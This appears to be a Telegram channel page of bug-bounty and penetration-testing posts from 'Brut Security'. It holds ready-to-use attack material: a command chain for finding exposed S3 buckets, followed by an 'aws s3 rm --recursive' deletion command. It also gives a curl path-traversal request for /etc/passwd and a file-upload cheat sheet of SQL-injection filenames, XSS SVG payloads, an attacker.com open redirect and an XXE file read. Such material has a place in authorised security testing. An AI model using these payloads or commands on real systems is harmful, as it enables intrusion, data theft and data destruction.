Brut Security
14.8K subscribers
943 photos
75 videos
289 files
988 links
βœ…Queries: @wtf_brut
πŸ›ƒWhatsApp: wa.link/brutsecurity
🈴Training: brutsec.com
πŸ“¨E-mail: [email protected]
Download Telegram
Some Web Application Penetration testing or Bug Bounty notes :)

Download link: https://mega.nz/file/Jv4UyRZL#6ZuyrmCzfgDcwiKggXBJVshCTPrNwLJ3C6DXg_cfBTE
πŸ‘9πŸ”₯4
Bug Hunters Methodology v4
@Jason Haddix
πŸ‘9πŸ”₯4πŸ‘Ž3
πŸ‘©β€πŸ’»Take control of an S3 Bucket in less than a minuteπŸ‘©β€πŸ’»


echo REDACTED.COM | cariddi | grep js | tee js_files | httpx -mc 200 | nuclei -tags aws,amazon


aws s3 ls s3://REDACTEDCOM. s3. amazonaws. com
(If you still don't know the exact S3 Bucket you can use echo REDACTED.COM | cariddi -e -s -info)


aws s3 rm s3://REDACTEDCOM. s3. amazonaws. com --recursive
(It's joke, don't be a bad guy and report that...)



⚑️Happy Hacking⚑️
Please open Telegram to view this post
VIEW IN TELEGRAM
πŸ”₯4πŸ‘3
πŸ”₯6
Keep checking my old Posts to continue your learning Process!
πŸ‘9πŸ”₯3❀1
πŸ’₯Join Our Bugbounty Discussion Group πŸ’₯
πŸ”₯https://t.iss.one/brutsecπŸ”₯
πŸ€–https://discord.gg/GZBsQMY6πŸ€–
Please open Telegram to view this post
VIEW IN TELEGRAM
🚨 🚨 🚨 Too many people miss critical vulnerabilities because they assume a GET request can't have a body! 🚨 🚨 🚨


This is how you can send such a request using #curl :

$ curl 'target:1234/download?filename=TEST' --data 'filename=../../../../../../../etc/passwd' -X GET
πŸ‘9πŸ”₯4❀3πŸ₯°1
S3 Bucket Recon Method
πŸ‘17πŸ”₯2
JWT_Hacking.pdf
226.3 KB
πŸ”₯4
Attacking_AWS.pdf
1.6 MB
πŸ”₯4
Now you can detect phishing websites quickly with Nuclei❀

nuclei -l websites_Possible_Phishing -tags phishing -itags phishing
Please open Telegram to view this post
VIEW IN TELEGRAM
❀3πŸ”₯3πŸ‘1
Pwning_the_Domain_DACL_Abuse_EBook.pdf
3.6 MB
❀3πŸ‘1πŸ”₯1
πŸ”₯8
πŸ–₯Chaining Vulnerabilities through File UploadπŸ–₯

SLQi⏳
'sleep(20).jpg
sleep(25)-- -.jpg


Path traversal⏳
../../etc/passwd/logo.png
../../../logo.png


XSS⏳
->  Set file name filename="svg onload=alert(document.domain)>" , filename="58832_300x300.jpg<svg onload=confirm()>"

-> Upload using .gif file
GIF89a/<svg/onload=alert(1)>/=alert(document.domain)//;

-> Upload using .svg file
<svg xmlns="w3.org/2000/svg" onload="alert(1)"/>

-> <?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "w3.org/Graphics/SVG/1…"><svg version="1.1" baseProfile="full" xmlns="w3.org/2000/svg">
<rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
<script type="text/javascript">
alert("HolyBugx XSS");
</script>
</svg>


Open redirect ⏳
<code>
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<svg
onload="window.location='attacker.com'"
xmlns="w3.org/2000/svg">
<rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
</svg>
</code>

XXE ⏳
<?xml version="1.0" standalone="yes"?>
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/hostname" > ]>
<svg width="500px" height="500px" xmlns="w3.org/2000/svg" xmlns:xlink="w3.org/1999/xlink" version="1.1
<text font-size="40" x="0" y="16">&xxe;</text>
</svg>
Please open Telegram to view this post
VIEW IN TELEGRAM
❀13πŸ‘6πŸ”₯1
Blind SQL Injection Detection and Exploitation (Cheat Sheet)
πŸ‘Ž4πŸ”₯2😁1